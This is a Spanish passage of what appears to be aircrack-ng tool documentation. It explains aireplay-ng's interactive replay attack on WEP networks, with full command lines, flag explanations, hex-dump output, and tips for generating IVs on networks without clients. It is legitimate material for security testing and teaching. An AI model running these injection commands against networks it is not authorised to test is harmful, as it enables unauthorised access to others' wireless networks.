Este ataque nos permite escoger el paquete a reenviar (inyectar). Este ataque puede obtener paquetes para inyectar de 2 formas. La primera es capturando paquetes con la tarjeta wireless. La segunda es utilizando un archivo cap. El formato estandard cap o Pcap (Packet CAPture, está asociado con la librería libpcap http://www.tcpdump.org), es reconocido por la mayoría de los programas de captura y análisis de tráfico. Esto permite leer paquetes capturados en sesiones anteriores, o que han sido obtenidos con otros ataques. Un uso común puede ser leer un archivo creado con packetforge-ng.

aireplay-ng -2 <opciones de filtro> <opciones de reenvio> -r <nombre de archivo> <interface>

Donde:

• -2 significa ataque de reenvio interactivo
• <opciones de filtro> se describen aquí
• <opciones de reenvio> se describen aquí
• -r <nombre de archivo> se usa para especificar un archivo cap del que leer los paquetes para inyectarlos (es opcional)
• <interface> es la interface wireless, por ejemplo ath0

Podrías usarlo, por ejemplo, para radiodifundir (broadcast) los paquetes del AP y generar nuevos vectores de inicialización (IVs):

 aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82  ath0

Donde:

• -2 significa ataque de inyección interactivo
• -p 0841 fija el “Frame Control” en el paquete para que parezca que está siendo enviado desde un cliente wireless.
• -c FF:FF:FF:FF:FF:FF fija como dirección MAC de destino cualquiera (broadcast). Esto es necesario para que el AP responda con otro paquete y así generar un nuevo IV.
• -b 00:14:6C:7E:40:80 es la dirección MAC del punto de acceso (BSSID). Este es un filtro para seleccionar un único AP.
• -h 00:0F:B5:88:AC:82 es la dirección MAC de los paquetes que se están transmitiendo, que debe coincidir con la MAC de tu tarjeta wireless.
• ath0 es el nombre de la interface wireless.

Los IVs generados por segundo variarán dependiendo del tamaño del paquete que seleccionemos. Cuanto más pequeño sea el tamaño del paquete, mayor será la velocidad por segundo. Cuando lanzemos el programa, veremos algo como esto:

 Read 99 packets...
 
      Size: 139, FromDS: 1, ToDS: 0 (WEP)
 
           BSSID  =  00:14:6C:7E:40:80
       Dest. MAC  =  01:00:5E:00:00:FB
      Source MAC  =  00:40:F4:77:E5:C9
 
      0x0000:  0842 0000 0100 5e00 00fb 0014 6c7e 4080  .B....^.....l~@.
      0x0010:  0040 f477 e5c9 5065 917f 0000 e053 b683  .@.w..Pe....S..
      0x0020:  fff3 795e 19a3 3313 b62c c9f3 c373 ef3e  ..y^..3..,...s.>
      0x0030:  87a0 751a 7d20 9e6c 59af 4d53 16d8 773c  ..u.} .lY.MS..w<
      0x0040:  af05 1021 8069 bbc8 06ea 59f3 3912 09a9  ...!.i....Y.9...
      0x0050:  c36d 1db5 a51e c627 11d1 d18c 2473 fae9  .m.....'....$s..
      0x0060:  84c0 7afa 8b84 ebbb e4d2 4763 44ae 69ea  ..z.......GcD.i.
      0x0070:  b65b df63 8893 279b 6ecf 1af8 c889 57f3  .[.c..'.n.....W.
      0x0080:  fea7 d663 21a6 3329 28c8 8f              ...c!.3)(..
 
 Use this packet ? 

Respondiendo “y” los paquetes serán inyectados:

 Saving chosen packet in replay_src-0303-103920.cap
 You should also start airodump-ng to capture replies.
 
 Sent 4772 packets...

Utilizando el filtro para indicar el tamaño del paquete, podemos usar manualmente el ataque 2 para reenviar peticiones ARP con encriptación WEP. Las peticiones ARP o “ARP requests” tienen un tamaño típico de 68 (si son de un cliente wireless) o 86 (si son de un cliente cableado) bytes:

aireplay-ng -2 -p 0841 -m 68 -n 86 -b 00:14:6C:7E:40:80 -c FF:FF:FF:FF:FF:FF -h 00:0F:B5:88:AC:82 ath0

Donde:

• -2 significa ataque de inyección interactivo
• -p 0841 fija el “Frame Control” para que parezca que el paquete se está enviando desde un cliente wireless.
• -m 68 es la longitud mínima del paquete
• -n 86 es la longitud máxima del paquete
• -c FF:FF:FF:FF:FF:FF fija la dirección MAC de destino como cualquiera (broadcast). Esto se requiere para que el AP conteste al paquete y así generar el nuevo IV.
• -b 00:14:6C:7E:40:80 es la dirección MAC del punto de acceso (BSSID). Este es un filtro para seleccionar un AP.
• -h 00:0F:B5:88:AC:82 es la dirección MAC de los paquetes que se están transmitiendo, que debe coincidir con la MAC de tu tarjeta wireless.
• ath0 es el nombre de la interface wireless.

Una vez que inicias el comando verás algo como:

 Read 145 packets...
 
      Size: 86, FromDS: 1, ToDS: 0 (WEP)
 
           BSSID  =  00:14:6C:7E:40:80
       Dest. MAC  =  FF:FF:FF:FF:FF:FF
      Source MAC  =  00:40:F4:77:E5:C9
 
      0x0000:  0842 0000 ffff ffff ffff 0014 6c7e 4080  .B..........l~@.
      0x0010:  0040 f477 e5c9 9075 a09c 0000 d697 eb34  .@.w...u.......4
      0x0020:  e880 9a37 8bda d0e7 fdb4 252d d235 313c  ...7......%-.51<
      0x0030:  16ab 784c 5a45 b147 fba2 fe90 ae26 4c9d  ..xLZE.G.....&L.
      0x0040:  7d77 8b2f 1c70 1d6b 58f7 b3ac 9e7f 7e43  }w./.p.kX....~C
      0x0050:  78ed eeb3 6cc4                           x...l.
 
 Use this packet ? y

Contesta “y” si el paquete es de 68 o 86 bytes, en otro caso escribe “n”. Ahora empezará a inyectar paquetes:

 Saving chosen packet in replay_src-0303-124624.cap
 You should also start airodump-ng to capture replies.

Como decíamos antes, aireplay-ng se puede usar para reenviar paquetes guardados en un archivo cap. Date cuenta que puedes leer en el ejemplo: “Saving chosen packet in replay_src-0303-124624.cap”. También se puede usar cualquier otro archivo cap creado no solo con aireplay-ng, sino también con airodump-ng, kismet, etc.

A continuación puedes ver un ejemplo usando el archivo cap anterior:

aireplay-ng -2 -p 0841 -b 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 -r replay_src-0303-124624.cap ath0

Donde:

• -2 significa ataque de inyección interactivo
• -p 0841 fija el “Frame Control” para que parezca que el paquete se está enviando desde un cliente wireless.
• -c FF:FF:FF:FF:FF:FF NOTE: Este parámetro no lo incluimos porque un paquete ARP ya tiene como destino cualquier dirección MAC (broadcast).
• -b 00:14:6C:7E:40:80 es la dirección MAC del punto de acceso (BSSID). Este es un filtro para seleccionar un AP.
• -h 00:0F:B5:88:AC:82 es la dirección MAC de los paquetes que se están transmitiendo, que debe coincidir con la MAC de tu tarjeta wireless.
• ath0 es el nombre de la interface wireless.

El programa responde:

      Size: 86, FromDS: 1, ToDS: 0 (WEP)
 
           BSSID  =  00:14:6C:7E:40:80
       Dest. MAC  =  FF:FF:FF:FF:FF:FF
      Source MAC  =  00:40:F4:77:E5:C9
 
      0x0000:  0842 0000 ffff ffff ffff 0014 6c7e 4080  .B..........l~@.
      0x0010:  0040 f477 e5c9 9075 a09c 0000 d697 eb34  .@.w...u.......4
      0x0020:  e880 9a37 8bda d0e7 fdb4 252d d235 313c  ...7......%-.51<
      0x0030:  16ab 784c 5a45 b147 fba2 fe90 ae26 4c9d  ..xLZE.G.....&L.
      0x0040:  7d77 8b2f 1c70 1d6b 58f7 b3ac 9e7f 7e43  }w./.p.kX....~C
      0x0050:  78ed eeb3 6cc4                           x...l.
 
 Use this packet ? y

Respondemos “y” para seleccionar ese paquete. Y seguidamente comenzará a inyectar los paquetes:

 Saving chosen packet in replay_src-0303-124624.cap
 You should also start airodump-ng to capture replies.
 

Hay algunas aplicaciones interesantes del primer ejemplo anterior. Se puede usar para atacar redes sin clientes wireless conectados. Inicia el ataque de aireplay-ng. Ahora siéntate y espera por algún paquete que vaya destinado a cualquier cliente (broadcast). No importa de que tipo sea. Responde “y” y se empezarán a generar IVs. El mayor problema puede ser la velocidad, ten en cuenta que los paquetes grandes producen menos IVs por segundo. La mayor ventaja es poder utilizarlo una vez que hemos obtenido el “xor” (con chopchop o el ataque de fragmentación), construyendo un paquete y enviándolo con este ataque.

Esto también funcionará en APs con clientes. Es mucho más rápido ya que no es necesario esperar por un ARP, cualquier paquete nos servirá.

El problema más común es que no estés asociado con el AP. Incluso si usas una dirección MAC de un cliente ya asociado con el AP o si usas la falsa autenticación.

Revisa el tutorial Estoy inyectando pero los ivs no aumentan.

También mira las ideas y problemas generales de aireplay-ng: Problemas de uso de aireplay-ng.